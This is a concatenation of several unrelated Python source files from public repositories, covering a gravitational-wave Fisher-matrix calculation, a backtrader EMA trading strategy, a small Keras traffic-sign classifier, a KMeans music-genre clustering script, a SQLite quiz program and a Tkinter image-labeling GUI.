1-D power-law population model.\n\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport matplotlib as mpl\nimport seaborn as sns\nimport time\nimport pickle\n\n\nfrom scipy.special import erfc\nfrom sympy.parsing import mathematica as M\n\n\n# Load 
Mathematica expressions calculated offline. See notes on how to calculate Fisher matrix.\nwith open('Fisher_expressions.pickle', 'rb') as handle:\n Fisher_expressions = pickle.load(handle)\n\n\ndef Dalpha(Nobs,alpha,Mmin,Mmax):\n \n \"\"\"\n Estimates without selection effects.\n This expression is only valid for 1D fitting, and crucially it only accounts for the first term in the FM. \n More accurate estimates can be obtained with the Fisher matrix expression below.\n It is however a useful function to have for its compactness.\n \"\"\"\n\n with open('Fisher_expressions.pickle', 'rb') as handle:\n b = pickle.load(handle)\n\n Dalpha_simpified = M.mathematica(Fisher_expressions['Da_no_sel_firstterm']) # from Mathematica notebook.\n out = Dalpha_simpified.subs([('Nobs',Nobs),('alpha',alpha),('Mmax',Mmax),('Mmin',Mmin)]).evalf()\n \n return float(out)\n\ndef gaussian(d,mu,Sigma_sq): \n \n # My redefinition of gaussian to take the sigma^2 as input.\n \n num = np.exp(-0.5*(d-mu)**2/Sigma_sq)\n den = np.sqrt(2*np.pi*Sigma_sq)\n \n return num/den\n\n\n# Selection functions and derivatives.\n\ndef pdet_lambda(theta_samples,N_samps_selfunction,sigma,dth): \n \n \"\"\"\n \n Function for the selection function of the hyperparameters.\n \n Inputs:\n \n - theta_samples: an array of sampled data.\n - N_samps_selfunction: number of samples for the Monte Carlo integration.\n - sigma: noise variance.\n - dth: threshold in the presence of selection effects.\n \n \"\"\"\n return 0.5*N_samps_selfunction**-1*np.sum(erfc((dth-theta_samples)/np.sqrt(2)/sigma))\n\n\ndef pdet_theta(theta_samples,sigma,dth): \n \n \"\"\"\n \n Function for the selection function of the source parameters.\n Given the assumption of a gaussian noise model, we can analytically write down \n the function without resorting to Monte Carlo integration.\n \n Inputs:\n \n - theta_samples: an array of sampled data.\n - sigma: noise variance.\n - dth: threshold in the presence of selection effects.\n \n \"\"\"\n \n return 0.5* erfc((dth-theta_samples)/np.sqrt(2)/sigma)\n\n\n\n\ndef dpdet_dlambda(theta_samples, Lambda,lowerlimit,upperlimit,NsampsSelFct,var,threshold): \n \n \"\"\"\n Function for the first derivative of the selection function. Returns a number.\n \"\"\"\n \n arg_der_plambda = M.mathematica(Fisher_expressions['arg_der_plambda'])\n arg_list=[]\n \n for lnM in theta_samples:\n \n out = arg_der_plambda.subs([('alpha',Lambda),('Mmax',upperlimit),('Mmin',lowerlimit),('lnM',lnM)]).evalf()\n arg_list.append(float(out))\n \n arg = pdet_theta(theta_samples,var,threshold) * arg_list #set up argument of integral.\n \n return NsampsSelFct**-1*np.sum(arg) \n\n\n\ndef ddpdet_ddlambda(theta_samples, Lambda,lowerlimit,upperlimit,NsampsSelFct,var,threshold): \n \n \"\"\"\n Function for the second derivative of the selection function. Returns a number.\n \"\"\"\n \n arg_doubleder_plambda = M.mathematica(Fisher_expressions['arg_doubleder_plambda'])\n\n\n arg_list=[]\n \n for lnM in theta_samples:\n \n out = arg_doubleder_plambda.subs([('alpha',Lambda),('Mmax',upperlimit),('Mmin',lowerlimit),('lnM',lnM)]).evalf()\n arg_list.append(float(out))\n \n arg = pdet_theta(theta_samples,var,threshold) * arg_list\n \n return NsampsSelFct**-1*np.sum(arg) \n\n\n\n\ndef FM_1D_powerlaw(theta_samples,Lambda,upperlimit,lowerlimit,var,threshold,NsampsSelFct,Ndetections):\n \n t0 = time.time()\n \n # Load analytical expressions for the arguments of the integrals to solve here. 
See notes for more details.\n \n GammaI_arg = M.mathematica(Fisher_expressions['A_theta'])\n GammaII_arg = M.mathematica(Fisher_expressions['B_theta'])\n GammaIII_arg = M.mathematica(Fisher_expressions['C_theta'])\n GammaIV_arg = M.mathematica(Fisher_expressions['D_theta'])\n GammaV_arg = M.mathematica(Fisher_expressions['E_theta'])\n\n substitutions = [('selfct',pdet_lambda(theta_samples,NsampsSelFct,var,threshold)),\n ('derselfct',dpdet_dlambda(theta_samples,Lambda,lowerlimit,upperlimit, \n NsampsSelFct, var, threshold)),\n ('dderselfct',ddpdet_ddlambda(theta_samples,Lambda,lowerlimit,upperlimit, \n NsampsSelFct, var, threshold)),\n ('alpha',Lambda),\n ('Mmax',upperlimit),\n ('Mmin',lowerlimit),\n ('sigma',var),\n ('dth',threshold)\n ]\n \n \n ###################################\n # MC integration of the first term.\n ###################################\n \n \n GammaI_out = GammaI_arg.subs(substitutions).evalf() \n GammaI_out = GammaI_out * pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) # set up argument of integral.\n GammaI_int = float(NsampsSelFct**-1*np.sum(GammaI_out)) # perform the MC integration here.\n \n tI = time.time()\n print('------------------------------------------------')\n print('The first term in the FM takes', int(tI-t0), 's to evaluate')\n print('First integral:', Ndetections *GammaI_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the second term.\n ###################################\n \n \n GammaII_list=[]\n GammaII_arg_temp = GammaII_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaII_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaII_list.append(float(out))\n \n GammaII_arg = GammaII_list*pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaII_int = NsampsSelFct**-1*np.sum(GammaII_arg)# perform the MC integration here.\n \n tII = time.time()\n print('The second term in the FM takes', int(tII-tI), 's to evaluate')\n print('Second integral:', Ndetections *GammaII_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the third term.\n ###################################\n \n \n GammaIII_list=[]\n GammaIII_arg_temp = GammaIII_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaIII_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaIII_list.append(float(out))\n \n GammaIII_arg = GammaIII_list/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaIII_int = NsampsSelFct**-1*np.sum(GammaIII_arg)# perform the MC integration here.\n \n tIII = time.time()\n print('The third term in the FM takes', int(tIII-tII), 's to evaluate')\n print('Third integral:', Ndetections *GammaIII_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the fourth term.\n ###################################\n \n \n GammaIV_list=[]\n GammaIV_arg_temp = GammaIV_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are 
evaluated into a list for each sample of the masses.\n out = GammaIV_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaIV_list.append(float(out))\n \n GammaIV_arg = GammaIV_list/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaIV_int = NsampsSelFct**-1*np.sum(GammaIV_arg)# perform the MC integration here.\n \n tIV = time.time()\n print('The fourth term in the FM takes', int(tIV-tIII), 's to evaluate')\n print('Fourth integral:', Ndetections *GammaIV_int)\n print('------------------------------------------------')\n \n ###################################\n # MC integration of the fifth term.\n ###################################\n \n \n GammaV_list=[]\n GammaV_arg_temp = GammaV_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaV_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaV_list.append(float(out))\n \n GammaV_arg = GammaV_list*pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaV_int = NsampsSelFct**-1*np.sum(GammaV_arg)# perform the MC integration here.\n \n tV = time.time()\n print('The fifth term in the FM takes', int(tV-tIV), 's to evaluate')\n print('Fifth integral:', Ndetections *GammaV_int)\n print('------------------------------------------------')\n \n return Ndetections * (GammaI_int + GammaII_int + GammaIII_int + GammaIV_int + GammaV_int)\n\n","repo_name":"aantonelli94/PopFisher","sub_path":"GW_like_examples/Fisher_PowerLaw.py","file_name":"Fisher_PowerLaw.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"37449885221","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport pandas as pd\nimport numpy as np\nimport talib as ta\nimport matplotlib.pyplot as plt\nimport csv\nimport backtrader as bt\nimport datetime as dt\nfrom datetime import date,time,timedelta\n\n\nclass FirstStrategy(bt.Strategy):\n params=(\n ('exitbars',12),\n )\n def log(self,txt):\n print(txt)\n def __init__(self):\n self.datetime = self.datas[0].datetime\n self.dataclose = self.datas[0].close\n self.dataopen = self.datas[0].open\n self.datahigh = self.datas[0].high\n self.datalow = self.datas[0].low\n self.ema13=bt.indicators.ExponentialMovingAverage(self.datas[0],period=13)\n self.ema34 = bt.indicators.ExponentialMovingAverage(self.datas[0], period=34)\n self.buy1=-1\n self.sell1=-1\n self.candlebuy=0\n self.candlesell=0\n\n\n '''\n def notify_order(self, order):\n if order.status in [order.Submitted,order.Accepted]:\n return\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(\"Buy Executed:\"+str(order.executed.price))\n elif order.issell():\n self.log(\"Sell Executed:\"+str(order.executed.price))\n self.bar_executed=len(self)\n elif order.status in [order.Canceled,order.Margin,order.Rejected]:\n self.log('Order cancelled/Margin not sufficient/Rejected')\n\n '''\n def next(self):\n self.combined1 = dt.datetime.combine(self.datetime.date(), dt.time(9, 15))\n self.combined2 = dt.datetime.combine(self.datetime.date(), dt.time(15, 00))\n self.combined3 = dt.datetime.combine(self.datetime.date(), dt.time(15, 10))\n self.log(\"CLOSE:\"+str(self.dataclose[0]))\n self.log(\"OPEN:\"+str(self.dataopen[0]))\n self.log(\"LOW:\"+str(self.datalow[0]))\n 
self.log(\"HIGH:\"+str(self.datahigh[0]))\n self.log(\"TIME:\"+str(self.datetime.datetime()))\n self.log(\"EMA13:\"+str(self.ema13[0]))\n self.log(\"EMA34:\"+str(self.ema34[0]))\n\n if not self.position:\n if self.datetime.datetime() self.ema13[0] and self.dataclose[0]>self.ema34[0]):\n self.log(str(self.datetime.datetime())+\" BUY TRIGGERED \"+str(self.dataclose[0]))\n self.stoplossbuy=self.datalow[0]\n self.order=self.buy()\n self.log(\"STOPLOSS FOR BUY IS:\"+str(self.stoplossbuy))\n self.buy1=0\n self.candlebuy=0\n if (self.datalow[-1]>self.ema13[0] or self.datalow[-1] >self.ema34[0]) and (self.dataclose[0]=self.params.exitbars or self.dataclose[0]<=self.stoplossbuy or self.dataopen[0]<=self.stoplossbuy or self.datalow[0]<=self.stoplossbuy or self.datetime.datetime==self.combined3:\n self.log(str(self.datetime.datetime())+\"BUY EXIT\"+str(self.dataclose[0]))\n self.close()\n self.log(\"Updated balance:\"+str(cerebro.broker.getvalue()))\n if self.sell1==0:\n self.candlesell+=1\n if self.candlebuy>=self.params.exitbars or self.dataclose[0]>=self.stoplosssell or self.dataopen[0]>=self.stoplosssell or self.datahigh[0]>=self.stoplosssell or self.datetime.datetime==self.combined3:\n self.log(str(self.datetime.datetime())+\"SELL EXIT\"+str(self.dataclose[0]))\n self.close()\n self.log(\"Updated balance:\"+str(cerebro.broker.getvalue()))\n\n\n\n\n\n\n\n def stop(self):\n self.log(\"Finished with the processing\")\n\n\n\nif __name__=='__main__':\n cerebro=bt.Cerebro()\n cerebro.addstrategy(FirstStrategy,exitbars=5)\n datapath=\"D:/Trading/Backtesting_Course/testdata/NIFTY_F1_5min.csv\"\n data=bt.feeds.GenericCSVData(\n dataname=datapath,\n fromdate=dt.datetime(2018, 1, 1),\n todate=dt.datetime(2018, 1, 5),\n datetime=0,\n timeframe=bt.TimeFrame.Minutes,\n compression=1,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n open=1,\n high=2,\n low=3,\n close=4,\n volume=None,\n openinterest=None,\n reverse=False,\n header=0\n )\n cerebro.adddata(data)\n # cerebro.adddata(data2)\n cerebro.addsizer(bt.sizers.FixedSize, stake=75)\n #cerebro.broker.setcommission(commission=0.001)\n cerebro.broker.set_cash(1000000.00)\n print(\"Starting portfolio value:\" + str(cerebro.broker.getvalue()))\n cerebro.run()\n print(\"Final portfolio value:\" + str(cerebro.broker.getvalue()))\n cerebro.plot(volume=False)\n\n\n\n\n\n\n\n","repo_name":"Bismoy943/STA_Assigns_Bismoy","sub_path":"W06D38/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73258199193","text":"import os\nimport string\nimport numpy as np\nfrom PIL import Image\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.models import load_model\n\nclass LISAModel:\n num_channels = 3\n image_size = 32\n num_labels = 8\n\n def __init__(self, restore, session=None):\n\n model = Sequential()\n\n layers = [Conv2D(64, [8, 8],\n strides=(2, 2),\n padding=\"same\",\n input_shape=[self.image_size,\n self.image_size,\n self.num_channels],\n data_format='channels_last'),\n Activation('relu'),\n Conv2D(64 * 2, [6, 6],\n strides=(2, 2),\n padding=\"valid\"),\n Activation('relu'),\n Conv2D(64 * 2, [5, 5],\n strides=(1, 1),\n padding=\"valid\"),\n Activation('relu'),\n Flatten(),\n Dense(self.num_labels)]\n\n for layer in layers:\n model.add(layer)\n\n model.load_weights(restore)\n 
self.model = model\n\n    def predict(self, data, tanhspace=0): # tanhspace doesn't matter here\n        return self.model(data)\n\nif __name__ == \"__main__\":\n    data = LISA(mode='color', shuffle=False)\n    print(data.data.shape, data.labels.shape)\n","repo_name":"Harry1993/GhostImage","sub_path":"setup_lisa.py","file_name":"setup_lisa.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"35665653951","text":"# Read the number of test cases\nn = int(input())\nfor i in range (n):\n# Use slicing to read the height and the number of bounces\n\thigh,count = list(map(int,input().split()))\n\t# Save the initial height\n\trun = high\n\t# Compute the heights after the first bounce\n\tfor j in range(count-1):\n\t\t\thigh = high / 2\n\t\t\trun = run + high * 2\n\tprint(\"%.2f\"%run)\n\t","repo_name":"1354107742/PythonForLearning","sub_path":"runball.py","file_name":"runball.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41450267798","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nlabelEncoder = LabelEncoder()\nscaler = MinMaxScaler()\n\ndata = pd.read_csv('data_w_genres.csv')\ndata.drop(['key', 'mode', 'count'], axis=1, inplace=True)\ncolumns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness','genres']\n\nnewData = data.replace(0, np.nan).dropna(axis=0, how='any')\nnewData = newData[columns]\n\nnewData = newData[newData.genres != \"[]\"]\nnewData.reset_index(drop=True, inplace=True)\nfilterDataArray = []\nrap = 0\nclassical = 0\n\nfor index, row in newData.iterrows():\n    if(\"rap\" in row['genres'] and rap <1100):\n        newData.at[index, 'genres'] = 'rap'\n        filterDataArray.append(newData.iloc[index])\n        rap = rap + 1\n    elif(\"classical\" in row['genres'] and classical <1100):\n        newData.at[index, 'genres'] = 'classical'\n        filterDataArray.append(newData.iloc[index])\n        classical = classical + 1\n        \n    \n    \nfilterData = pd.DataFrame(filterDataArray, columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness', 'genres'])\nlabelEncoder = LabelEncoder()\nlabelEncoder.fit(filterData['genres'])\nfilterData['genres'] = labelEncoder.transform(filterData['genres'])\n\n\nx = np.array(filterData.drop(['genres'], 1).astype(float))\nfilterData= filterData.drop(['genres'], 1)\n\nX_scaled = scaler.fit_transform(x)\nkmeans = KMeans(n_clusters=2, max_iter=600).fit(X_scaled)\n\n\nfilterData['kmeans'] = kmeans.labels_\nfilterData.columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness','kmeans']\n\nfig = px.scatter_3d(filterData, x='instrumentalness', y='acousticness', z='danceability',\n              color='kmeans')\nfig.show()\n\nc0 = filterData[filterData['kmeans']==0]\nc1 = filterData[filterData['kmeans']==1]\n\n\nc0.drop(['kmeans'], axis=1, inplace=True)\nc1.drop(['kmeans'], axis=1, inplace=True)\n\nx = c0.values #returns a numpy array\nc0_scaled = scaler.fit_transform(x)\nc0 = pd.DataFrame(c0_scaled)\nc0.columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness' ]\nc0=c0.melt(var_name='groups', value_name='rap')\n\nx = c1.values #returns a numpy array\nc1_scaled = scaler.fit_transform(x)\nc1 = pd.DataFrame(c1_scaled)\nc1.columns = ['instrumentalness', 'acousticness', 
'danceability','energy','liveness']\nc1=c1.melt(var_name='groups', value_name='classical')\n\n\nf, axes = plt.subplots(2, 1)\nax = sns.violinplot( data=c0 ,x=\"groups\", y=\"rap\", linewidth = 0.6, inner = 'point', scale= 'width', ax=axes[0])\nax = sns.violinplot( data=c1 ,x=\"groups\", y=\"classical\", linewidth = 0.6, inner = 'point', scale= 'width', ax=axes[1])\n\nplt.show()","repo_name":"Cogitus/ia-project-2020.2","sub_path":"Kmeans/kmeans_gender_final.py","file_name":"kmeans_gender_final.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14032012392","text":"import sqlite3\r\nimport random\r\nimport Question\r\n\r\ncon = sqlite3.connect('rm1.db')\r\ncur = con.cursor()\r\ninp_section = input(\"K1, K2, K3 ili I?\")\r\n\r\ncur.execute(\"select MAX(idq) from questions\")\r\n\r\nquestionNr = int(cur.fetchall()[0][0])\r\n\r\nwhile True:\r\n\r\n rand_nr = random.randint(1, questionNr)\r\n if inp_section[0] == 'I':\r\n cur.execute(\"select * from questions where questions.idq = ?\", (rand_nr,))\r\n else:\r\n cur.execute(\"select * from questions where questions.idq = ? and section = ? \", (rand_nr, inp_section[1]))\r\n fetched = cur.fetchone()\r\n if fetched is None:\r\n continue\r\n qText = fetched[1].strip()\r\n if fetched[2] == \"MulChoice\":\r\n question = Question.MultipleSolutionQuestion(qText, fetched[3])\r\n elif fetched[2] == \"SingleChoice\":\r\n question = Question.SingleSolutionQuestion(qText, fetched[3])\r\n elif fetched[2] == \"Essay\":\r\n question = Question.EssayQuestion(qText, fetched[3])\r\n elif fetched[2] == \"True/False\":\r\n question = Question.TrueFalseQuestion(qText, fetched[3])\r\n\r\n cur.execute(\"select * from statements where statements.idq = ?\", (rand_nr,))\r\n output = cur.fetchall()\r\n if fetched[2] == \"True/False\":\r\n question.add_statement(\"True\")\r\n # No soutions for these for now\r\n else:\r\n for x in output:\r\n question.add_statement(x[1], float(x[2]))\r\n print(question)\r\n\r\n inp = input()\r\n inp = inp.strip()\r\n\r\n try:\r\n\r\n if fetched[2] == \"MulChoice\":\r\n answs = inp.split()\r\n for answ in answs:\r\n question.mark_statement(int(answ))\r\n print(question.check_answer())\r\n elif fetched[2] == \"SingleChoice\":\r\n question.mark_statement(int(inp))\r\n print(question.check_answer())\r\n elif fetched[2] == \"Essay\":\r\n question.add_answer(inp)\r\n print(question.check_answer())\r\n elif fetched[2] == \"True/False\":\r\n question.add_answer(inp)\r\n print(question.check_answer())\r\n\r\n except:\r\n pass\r\n question.print_answer()\r\n","repo_name":"veljkoselakovic/RM1-pitanja","sub_path":"mainProgram.py","file_name":"mainProgram.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12206497597","text":"#importation\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox as mb\nfrom PIL import Image, ImageTk\nimport SimpleITK as sitk\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport threading\n\nlock = threading.RLock()\n\nclass progress_popup(tk.Toplevel):\n \n def __init__(self, master, text=''):\n self._flag = True\n tk.Toplevel.__init__(self, master=master)\n self.geometry('%dx%d+%d+%d' % (master.winfo_screenwidth() // 4, \n master.winfo_screenwidth() // 16, \n master.winfo_rootx() + master.winfo_width() // 2 - 
master.winfo_screenwidth() // 8, \n master.winfo_rooty() + master.winfo_height() // 2 - master.winfo_screenwidth() // 32\n )\n )\n self.attributes('-topmost', True)\n self.resizable(width=False, height=False)\n label = tk.Label(self, text=text)\n self._probar = ttk.Progressbar(self, \n length = master.winfo_screenwidth(), \n mode='determinate', \n orient='horizontal'\n )\n self._probar['value'] = 0\n label.pack(padx=20, pady=20)\n self._probar.pack(padx=20, pady=20)\n self.grab_set()\n\n def maximum(self, max):\n self._probar['maximum'] = max\n\n def step(self):\n self._probar.step()\n self._probar.update()\n \n def destroy(self):\n lock.acquire()\n self._flag = False\n lock.release()\n super().destroy()\n\nclass type_dialog(tk.Toplevel):\n\n def __init__(self, master=None, title='', types=('NULL',)):\n tk.Toplevel.__init__(self, master=master)\n self.attributes('-topmost', True)\n self.resizable(width=False, height=False)\n self._label = tk.Label(self, text='Please choose a(n) '+title+' type: ')\n self._typelist = ttk.Combobox(self, \n width=self.winfo_width(), \n state='readonly', \n )\n self._typelist['value'] = types\n self._typelist.current(0)\n self._btn = tk.Button(self,\n text='OK', \n command=self._ok, \n )\n self._label.pack(fill='both', padx=20, pady=10)\n self._typelist.pack(fill='both', padx=20)\n self._btn.pack(fill='both', padx=20, pady=10)\n self.geometry('%dx%d+%d+%d' % (master.winfo_screenwidth() // 8, \n master.winfo_screenwidth() // 16, \n master.winfo_rootx() + master.winfo_width() // 2 - master.winfo_screenwidth() // 16, \n master.winfo_rooty() + master.winfo_height() // 2 - master.winfo_screenwidth() // 32\n )\n )\n self.grab_set()\n self._type = None\n \n def _ok(self):\n self._type = self._typelist.get()\n self.destroy()\n\nclass BLW(tk.Tk):\n #class members\n _axis_color = {'X':'#f00', 'Y':'#0f0', 'Z':'#00f'}\n _plane_to_no = {'XY':0, 'YZ':1, 'XZ':2}\n _no_to_plane = 'XY', 'YZ', 'XZ'\n\n def __init__(self):\n tk.Tk.__init__(self)\n #object vars\n self._btn_value = 'XY'\n self._radio_var = tk.StringVar()\n self._surf_on = tk.BooleanVar()\n self._axes_on = tk.BooleanVar()\n self._combolist_text = tk.StringVar()\n self._cache = {}\n self._pic_handle = None\n self._path_v3d = ''\n self._dir = None\n self._btn = {}\n self._radio = {}\n self._menu = {}\n self._rawtype = None\n self._masktype = None\n frame = {}\n # mainwindow\n self.title('Batch Label Widget')\n style = ttk.Style(self)\n scrw, scrh = self.winfo_screenwidth(), self.winfo_screenheight()\n style.configure('XYZ.TButton', \n font=('Helvetica', scrh//32, 'bold')\n )\n style.configure('LF.TButton', \n font=('Helvetica', scrh//16, 'bold')\n )\n self.geometry('%dx%d+%d+%d' % (scrw//2, scrh//2, scrw//4, scrh//4))\n self.minsize(scrw//2, scrh//2)\n # menubar\n menubar = tk.Menu(self)\n self._menu['file'] = tk.Menu(menubar, tearoff=False)\n self._menu['tool'] = tk.Menu(menubar, tearoff=False)\n self._menu['help'] = tk.Menu(menubar, tearoff=False)\n menubar.add_cascade(label='File', menu=self._menu['file'])\n menubar.add_cascade(label='Tool', menu=self._menu['tool'])\n menubar.add_cascade(label='Help', menu=self._menu['help'])\n self._menu['file'].add_command(label='Open a dir..', \n command=self._open_dir, \n accelerator='Ctrl+O'\n )\n self._menu['file'].add_command(label='Save labels as..', \n command=self._save_as, \n state='disabled', \n accelerator='Ctrl+S'\n )\n self._menu['file'].add_separator()\n self._menu['file'].add_command(label='Exit', command=self.destroy)\n self._menu['tool'].add_command(label='Set 
Vaa3D path..', command=self._set_v3d_path)\n self._menu['tool'].add_command(label='Display on Vaa3D', \n command=self._display_on_v3d, \n accelerator='Ctrl+V'\n )\n self._menu['help'].add_command(label='About', command=BLW._about)\n self.config(menu=menubar)\n # upper\n frame['up'] = tk.LabelFrame(self, \n text='Plane Panel', \n height=scrh // 10\n )\n frame['up'].pack(fill='x', \n expand='no', \n padx=10, \n pady=10\n )\n frame['up'].pack_propagate(0)\n self._btn['XY'] = ttk.Button(frame['up'], \n text='XY', \n command=lambda : self._turn_plane(plane='XY'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['YZ'] = ttk.Button(frame['up'], \n text='YZ', \n command=lambda : self._turn_plane(plane='YZ'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['XZ'] = ttk.Button(frame['up'], \n text='XZ', \n command=lambda : self._turn_plane(plane='XZ'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['XY'].pack(side='left', \n expand='yes', \n fill='both', \n padx=10, \n pady=10\n )\n self._btn['XZ'].pack(side='right', \n expand='yes', \n fill='both', \n padx=10, \n pady=10\n )\n self._btn['YZ'].pack(side='left', \n expand='yes', \n fill='both', \n pady=10\n )\n # middle\n frame['mid'] = tk.Frame(self)\n frame['mid'].pack(fill='both', \n expand='yes', \n padx=10, \n pady=10\n )\n frame['mid'].pack_propagate(0)\n frame['left'] = tk.Frame(frame['mid'], width=scrw//20)\n frame['right'] = tk.Frame(frame['mid'], width=scrw//20)\n frame['canvas'] = tk.LabelFrame(frame['mid'], width=scrw*2//3)\n frame['left'].pack(side='left', \n expand='yes', \n anchor='e', \n fill='y'\n )\n frame['right'].pack(side='right', \n expand='yes', \n anchor='w', \n fill='y'\n )\n frame['canvas'].pack(side='left', \n expand='yes', \n fill='both'\n )\n frame['left'].pack_propagate(0)\n frame['right'].pack_propagate(0)\n frame['canvas'].pack_propagate(0)\n self._btn['left'] = ttk.Button(frame['left'], \n text='<', \n command=lambda : self._switch(-1), \n style='LF.TButton', \n state='disabled'\n )\n self._btn['right'] = ttk.Button(frame['right'], \n text='>', \n command=lambda : self._switch(1), \n style='LF.TButton', \n state='disabled'\n )\n self._btn['left'].pack(expand='yes', fill='both')\n self._btn['right'].pack(expand='yes', fill='both')\n self._view = tk.Canvas(frame['canvas'])\n self._view.pack(expand='yes', fill='both')\n # downer\n frame['down'] = tk.LabelFrame(self, \n text='Control Panel', \n height = scrh // 16\n )\n frame['down'].pack(side='bottom', \n fill='x', \n expand='no', \n anchor='s', \n padx=10, \n pady=10\n )\n frame['down'].pack_propagate(0)\n combolabel = tk.Label(frame['down'], \n text='Samples: ', \n font=('Arial', scrh//80)\n )\n combolabel.pack(side='left', padx=10)\n self._combolist = ttk.Combobox(frame['down'], \n width=scrw, \n state='readonly', \n textvariable=self._combolist_text\n )\n self._btn['open'] = tk.Button(frame['down'], \n text='Open', \n command=self._open_dir\n )\n self._btn['save'] = tk.Button(frame['down'], \n text='Save', \n command=self._save_as, \n state='disabled'\n )\n self._btn['save'].pack(side='right', \n padx=10, \n fill='y', \n pady=10\n )\n self._radio['y'] = tk.Radiobutton(frame['down'], \n text='YES', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='y', \n variable=self._radio_var\n )\n self._radio['n'] = tk.Radiobutton(frame['down'], \n text='NO', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='n', \n variable=self._radio_var\n )\n self._radio['na'] = 
tk.Radiobutton(frame['down'], \n text='N/A', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='na', \n variable=self._radio_var\n )\n # frame_check = tk.Frame(frame['down'])\n self._check_surf = tk.Checkbutton(frame['down'], \n text='Surface', \n state='disabled', \n font=('Arial', scrh//80), \n variable=self._surf_on\n )\n self._check_axes = tk.Checkbutton(frame['down'], \n text='Axes', \n state='disabled', \n font=('Arial', scrh//80), \n variable=self._axes_on\n )\n self._radio['na'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._radio['n'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._radio['y'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n # frame_check.pack(side='right', expand='yes')\n self._check_surf.pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._check_axes.pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._btn['open'].pack(side='right', \n padx=10, \n fill='y', \n pady=10\n )\n self._combolist.pack(side='left', \n fill='y', \n pady=10\n )\n # tracing and binding\n self._combolist_text.trace_add(mode='write', callback=self._repaint)\n self._combolist_text.trace_add(mode='write', callback=self._radio_update)\n self._combolist_text.trace_add(mode='write', callback=self._check_update)\n self._combolist_text.trace_add(mode='write', callback=self._lf_btn_update)\n self._radio_var.trace_add(mode='write', callback=self._repaint_label)\n self._surf_on.trace_add(mode='write', callback=self._repaint)\n self._axes_on.trace_add(mode='write', callback=self._repaint)\n self._view.bind('', self._repaint)\n self.bind('', self._scroll)\n self.bind('', self._scroll)\n self.bind('', self._scroll)\n self.bind('', self._key_open)\n self.bind('', self._key_open)\n self.bind('', self._key_save)\n self.bind('', self._key_save)\n self.bind('', self._key_v3d)\n self.bind('', self._key_v3d)\n self.bind('', self._key_switch)\n self.bind('', self._key_switch)\n self.bind('w', self._key_switch)\n self.bind('s', self._key_switch)\n self.bind('', self._key_turn_plane)\n self.bind('', self._key_turn_plane)\n self.bind('a', self._key_turn_plane)\n self.bind('d', self._key_turn_plane)\n 